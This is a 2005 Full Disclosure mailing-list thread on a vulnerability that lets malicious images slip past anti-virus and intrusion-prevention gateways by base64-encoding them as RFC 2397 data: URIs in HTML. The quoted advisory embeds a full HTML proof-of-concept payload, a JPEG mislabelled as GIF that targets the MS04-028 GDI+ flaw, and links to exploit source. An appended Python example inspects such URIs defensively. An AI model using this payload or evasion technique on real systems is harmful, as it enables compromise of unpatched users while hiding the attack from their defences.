Full Disclosure mailing list archives

Re: Multi-vendor AV gateway image inspection bypass vulnerability


From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 11 Jan 2005 18:56:00 -0800 (PST)

At this point I have no choice but to agree.

So far I've had an opportunity to test this with Check Point Interspect and McAfee IntruShield. Like you said, (in my lab) both detected and blocked the malicious image when it was formatted without RFC 2397, but when base64 encoded they were downloaded and executed their attack.

Basically it's looking like no security companies are looking at data formatted in this fashion. I'm not sure, but it seems like you can probably transfer anything you'd like by just changing the content type and your anti-virus, IDS, application firewall or whatever you're using at the network level would be completely oblivious.

On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds <lists () intrusense com> wrote:
Hello Danny,

This vulnerability is only applicable to the HTTP data while in transit. Once received by the client the image will be rendered and subsequently detected if local AV software is present.

At the present time, I'm not aware of any AV, IDS or IPS vendor that will detect malicious images embedded in HTML in this manner.


Thank you,

Darren Bounds
Intrusense, LLC.

--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme, a remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee); however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and the image is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme, Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.

## BEGIN HTML ##

<html>
<body>
<img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw/
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//Z">
</body>
</html>

## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html



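The gap the thread describes is that the gateways tested looked at image bytes on the wire but never decoded an RFC 2397 data: URI carried inside an HTML body. Two details of the advisory's own payload show what an inspector has to do: the attribute says image/gif while the base64 begins with /9j/, which decodes to FF D8 FF (the JPEG SOI marker), so the declared type cannot be trusted; and the payload arrived on the list wrapped over many lines, which browsers accept because they strip whitespace before decoding. The Python below is an added example written for this archive page, not code from the advisory, from Intrusense or from any product named in the thread. It pulls data: URIs out of src/href attributes, decodes them the forgiving way a browser does, identifies the real type from magic bytes, and walks JPEG marker segments for a length below 2, the malformed-comment condition behind MS04-028 (the advisory's image carries a comment segment with length 0). The HTML and image bytes in it are constructed for the example and are not the advisory's image; it assumes the inspector sees the complete HTML body.

```python
"""Gateway-side inspection of RFC 2397 data: URIs embedded in HTML.
Added example for this thread, not code from the advisory or any product named
in it. The HTML and image bytes below are constructed, not the advisory's payload.
Assumes the inspector sees the whole HTML body and images sit in src/href."""
import base64
import re
import urllib.parse

# Attribute values; [^"]* spans newlines because browsers tolerate a base64
# payload that a mail client wrapped over several lines.
ATTR_RE = re.compile(r'\b(?:src|href)\s*=\s*"([^"]*)"', re.IGNORECASE)

# Magic bytes, used instead of the attacker-controlled declared media type.
MAGIC = ((b"\xff\xd8\xff", "image/jpeg"), (b"GIF87a", "image/gif"),
         (b"GIF89a", "image/gif"), (b"\x89PNG\r\n\x1a\n", "image/png"))


def parse_data_uri(value):
    """Return (declared_mediatype, decoded_bytes) for a data: URI, else None."""
    if not value.lower().startswith("data:"):
        return None
    header, sep, payload = value[5:].partition(",")
    if not sep:
        return None
    params = [p.strip().lower() for p in header.split(";")]
    mediatype = params[0] or "text/plain"
    if "base64" in params[1:]:
        # Browsers strip whitespace before decoding; the gateway must too,
        # or a line-wrapped payload is never decoded at all.
        compact = re.sub(r"\s+", "", payload)
        compact += "=" * (-len(compact) % 4)
        return mediatype, base64.b64decode(compact)
    return mediatype, urllib.parse.unquote_to_bytes(payload)


def sniff_type(data):
    """Media type from magic bytes, or application/octet-stream if unknown."""
    for magic, mtype in MAGIC:
        if data.startswith(magic):
            return mtype
    return "application/octet-stream"


def jpeg_malformed_segment(data):
    """True if any marker segment declares a length below 2.
    The length field counts itself, so 0 and 1 are invalid; a comment (FF FE)
    with such a length is the MS04-028 trigger carried by the advisory's image."""
    i, n = 2, len(data)  # skip SOI (FF D8)
    while i + 1 < n:
        if data[i] != 0xFF:
            return False  # not at a marker; stop rather than guess
        marker = data[i + 1]
        if marker == 0xFF:
            i += 1  # fill byte
        elif marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            i += 2  # standalone markers carry no length field
        elif marker in (0xD9, 0xDA) or i + 3 >= n:
            return False  # EOI, start of scan data, or truncated
        else:
            length = (data[i + 2] << 8) | data[i + 3]
            if length < 2:
                return True
            i += 2 + length
    return False


def inspect_html(html):
    """One finding per data: URI found in src/href attributes."""
    findings = []
    for value in ATTR_RE.findall(html):
        parsed = parse_data_uri(value)
        if parsed is None:
            continue
        declared, data = parsed
        actual = sniff_type(data)
        findings.append({"declared": declared, "actual": actual, "size": len(data),
                         "type_mismatch": declared != actual,
                         "malformed_jpeg": actual == "image/jpeg"
                         and jpeg_malformed_segment(data)})
    return findings


# Constructed samples: SOI, a correct APP0 segment, a comment segment, EOI.
# BENIGN_JPEG's comment has a valid length (5); BAD_JPEG's claims 0.
_APP0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
BENIGN_JPEG = b"\xff\xd8" + _APP0 + b"\xff\xfe\x00\x05hi!" + b"\xff\xd9"
BAD_JPEG = b"\xff\xd8" + _APP0 + b"\xff\xfe\x00\x00" + b"\xff\xd9"

# Constructed HTML: the first image is mislabelled image/gif and its base64 is
# wrapped over several lines, as in the advisory; the second is benign.
_bad_b64 = base64.b64encode(BAD_JPEG).decode()
SAMPLE_HTML = (
    '<html><body>\n<img src="data:image/gif;base64,'
    + "\n".join(_bad_b64[i:i + 12] for i in range(0, len(_bad_b64), 12)) + '">\n'
    '<img src="data:image/jpeg;base64,' + base64.b64encode(BENIGN_JPEG).decode() + '">\n'
    '<a href="http://example.invalid/x.jpg">plain URL, not a data: URI</a>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    for finding in inspect_html(SAMPLE_HTML):
        print(finding)
```

Run stand-alone it reports two findings: the first flagged for both the type mismatch and the zero-length comment segment, the second clean. A real gateway would hand the decoded bytes to its normal image scanner at that point; the part the products in the thread were missing is everything before that hand-off.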